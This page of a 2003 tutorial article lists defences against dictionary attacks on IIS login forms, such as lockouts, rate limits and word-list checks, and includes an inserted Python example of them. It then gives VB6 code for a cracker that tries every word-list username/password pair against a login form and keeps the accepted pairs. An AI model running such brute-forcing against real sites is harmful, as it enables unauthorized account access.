Extranet/Intranet Dictionary Cracker in VB
By: Matt Burnett
    2003-01-15
    Extranet/Intranet Dictionary Cracker in VB - Building the Cracker


    (Page 2 of 3)

    The important elements of conducting a dictionary attack are 1) sending multiple UID/PW combinations, 2) the rate at which UID/PW combinations are sent, and 3) the ‘commonness’ of the UID/PW words. To defend against a dictionary attack, simply address any one of the elements above and the defending site will be significantly strengthened (disclaimer.h).

    In each element below, the defending server is an MS IIS Server; however, the concepts can be applied to any server.
    1. To defend against multiple UID/PW combinations, use the Session variable to track 3 incorrect access attempts. On the next attempt within the Session, automatically refuse access. In fact, even the correct UID/PW will be rejected in this scenario. When the Session times out, the system resets and the user can again gain access with the correct UID/PW.
    2. The ‘rate’ of sending UID/PW addresses the number of login attempts within a given period of time. After a user has failed 3 times, code the application to refuse login attempts for the next hour. The dictionary attack is dead, as it would take ~ 6.8 YEARS to use the smallest 100 word library.
    3. ‘Common’ words: need I say more? To force users to use uncommon words or random characters, generate passwords for users. I don’t like that method, so I take new passwords and compare them against a word library. If the submitted PW is in the library then a different one is requested.
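    As an added example (not the article's own code), the three defences above expressed as server-side logic: a per-session lockout that, after three failures, refuses even the correct UID/PW until an hour has passed and then resets, plus a check of new passwords against the same comma-delimited word list format the cracker reads. The names LoginThrottle, load_wordlist, password_acceptable and the sample word list are assumptions made for this example.

```python
"""Defender-side counterparts to the three dictionary-attack elements above.
Names (LoginThrottle, etc.) and the sample word list are constructed for this example."""
import time
from typing import Callable, Dict

MAX_FAILURES = 3          # the third failure triggers the lockout
LOCKOUT_SECONDS = 3600    # refuse login attempts for the next hour


class LoginThrottle:
    """Tracks failed attempts per key (a session id or account name)."""

    def __init__(self, clock: Callable[[], float] = time.time) -> None:
        self.clock = clock                    # injectable so the lockout can be tested
        self.failures: Dict[str, int] = {}
        self.locked_until: Dict[str, float] = {}

    def is_locked(self, key: str) -> bool:
        return self.clock() < self.locked_until.get(key, 0.0)

    def attempt(self, key: str, credentials_ok: bool) -> bool:
        """Return True only when not locked out AND the credentials are correct.
        While locked, even the correct UID/PW is refused; once the lockout
        expires the counter has already been reset, so the user can log in again."""
        if self.is_locked(key):
            return False
        if credentials_ok:
            self.failures.pop(key, None)
            return True
        count = self.failures.get(key, 0) + 1
        if count >= MAX_FAILURES:
            self.locked_until[key] = self.clock() + LOCKOUT_SECONDS
            self.failures.pop(key, None)   # system resets when the hour is up
        else:
            self.failures[key] = count
        return False


def load_wordlist(text: str) -> set:
    """Parse the same comma-delimited word list format the cracker's wordlist.txt uses."""
    return {w.strip().lower() for w in text.split(",") if w.strip()}


def password_acceptable(password: str, wordlist: set) -> bool:
    """Reject a new password if it appears in the common-word library."""
    return password.lower() not in wordlist


# Constructed sample word list in the article's wordlist.txt format.
SAMPLE_WORDLIST = load_wordlist("admin, guest,password, test,letmein")
```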
    The VB6 code below is compiled into a simple .exe that takes parameters such as the site address, UID and PW.

    Using a comma-delimited .txt file of common words, the program builds a matrix of possible UID/PW combinations and sends them to the site for verification. The remote server’s response is analyzed to determine whether access was granted. When the program is finished, a MsgBox displays the UID/PW combinations that were granted access.

    Public Function getDictionary(ByVal strURL As String, _
    ByVal strMethod As String, ByVal strForm As String, _
    ByVal strMatchNoEntry As String, ByVal UidLimitLen As Integer) As String
      Dim mHTTP As Object, aryDictionary() As String
      Dim fso As Object, TextStream As Object, S As String, ApplicationPath As String
      ApplicationPath = App.Path & "\"
      Set fso = CreateObject("Scripting.FileSystemObject")
      'wordlist.txt is the comma-delimited list of common words
      Set TextStream = fso.OpenTextFile(ApplicationPath & "wordlist.txt", 1)
      S = S & TextStream.ReadAll
      TextStream.Close
      aryDictionary = Split(S, ",")   'one word per element
      'mHTTP is the HTTP engine object; strURL and strMethod configure it (engine not shown)
      DoEvents
      getDictionary = getDictionaryAccess(strForm, UidLimitLen, mHTTP, strMatchNoEntry, aryDictionary)
    End Function

    Private Function getDictionaryAccess(ByVal Params As String, ByVal iSections As Integer, _
    ByRef mHTTP As Object, ByVal strMatchNoEntry As String, _
    ByRef aryDictionary() As String) As String
      'Returns ";" delimited string of params
      'assumes two params of username and password; the exact field names are passed in
      'getDictionaryAccess = "uid=matt&pwd=1;uid=matt&pwd=2;10006=DTM&10007=1999"
      'this guy will go 1, 2 and 3 characters against the Dictionary, then Dictionary against Dictionary
      'the random attack does the 1 to 3 uid and pw matrix
      Dim aryParams As Variant, strTemp As String, aryTemp() As String
      Dim uid As Integer, pw As Integer, strResponse As String, strSomeAccessPoints As String
      aryParams = Split(Params, ",")   'field names, e.g. "uid,pwd" (comma delimiter assumed)
      iSections = iSections + 1 'iSections allows control of word length
      On Error Resume Next
      For uid = 0 To UBound(aryDictionary)
        For pw = 0 To UBound(aryDictionary)
          If (Len(aryDictionary(uid)) < iSections) And (Len(aryDictionary(pw)) < iSections) Then
            getDictionaryAccess = aryParams(0) & "=" & aryDictionary(uid) & "&" & _
              aryParams(1) & "=" & aryDictionary(pw)
            '[HTTP engine method call: submit the current params to the form; left abstract by the author]
            Call IMWaiting(mHTTP)
            '[HTTP engine data retrieval: strResponse = the server's reply; left abstract by the author]
            Call IMWaiting(mHTTP)
            strResponse = Replace(strResponse, Chr(13), ";")
            If (strResponse <> "") Then
              'no "access denied" marker in the reply means the combination was accepted
              If InStr(strResponse, strMatchNoEntry) = 0 Then
                'strSomeAccessPoints has the params that GRANTED ACCESS
                strSomeAccessPoints = strSomeAccessPoints & aryDictionary(uid) & "," & aryDictionary(pw) & ";"
              End If
            End If
            strResponse = ""
            DoEvents
          End If
        Next
      Next
      On Error GoTo 0
      getDictionaryAccess = strSomeAccessPoints
    End Function

    © 2003-2009 by Developer Shed. All rights reserved. DS Cluster 2 Hosted by Hostway